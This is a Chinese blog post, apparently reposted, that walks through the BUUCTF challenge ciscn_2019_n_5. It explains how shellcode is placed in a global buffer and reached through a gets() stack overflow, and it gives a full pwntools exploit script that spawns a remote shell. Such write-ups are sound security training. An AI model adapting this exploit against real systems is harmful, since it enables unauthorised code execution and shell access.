首页 > 其他 > 详细

ciscn_2019_n_5来自BUUCTF

时间:2021-08-25 18:07:54      阅读:24      评论:0      收藏:0      [点我收藏+]

这是一道ret2shellcode的题目不难。还是想记录一下:

这次我的先查看一下程序的保护机制:

技术分享图片

 

 重点是 RWX: HasRWX segments 有这个基本就是ret2shellcode。因为程序中存在 可读可写可执行的片段这很危险的;

接着看一下IDA中的伪代码

技术分享图片

 

 程序中有两处输入,name这一个全局变量 在bss段。我们可以往name中写入 shellcode。下面还有一个gets函数,接着我们可以通过栈溢出劫持程序让程序执行name中的shellcode。

from pwn import*
context(arch=‘amd64‘,os=‘linux‘)
r=remote(‘node4.buuoj.cn‘,27513)
shellcode=asm(shellcraft.sh())
r.sendlineafter("tell me your name",shellcode)
payload=‘a‘*0x28+p64(0x601080)
r.sendlineafter("What do you want to say to me?",payload)
r.interactive()

ciscn_2019_n_5来自BUUCTF

原文:https://www.cnblogs.com/Mua2Uncle2blog/p/15185298.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!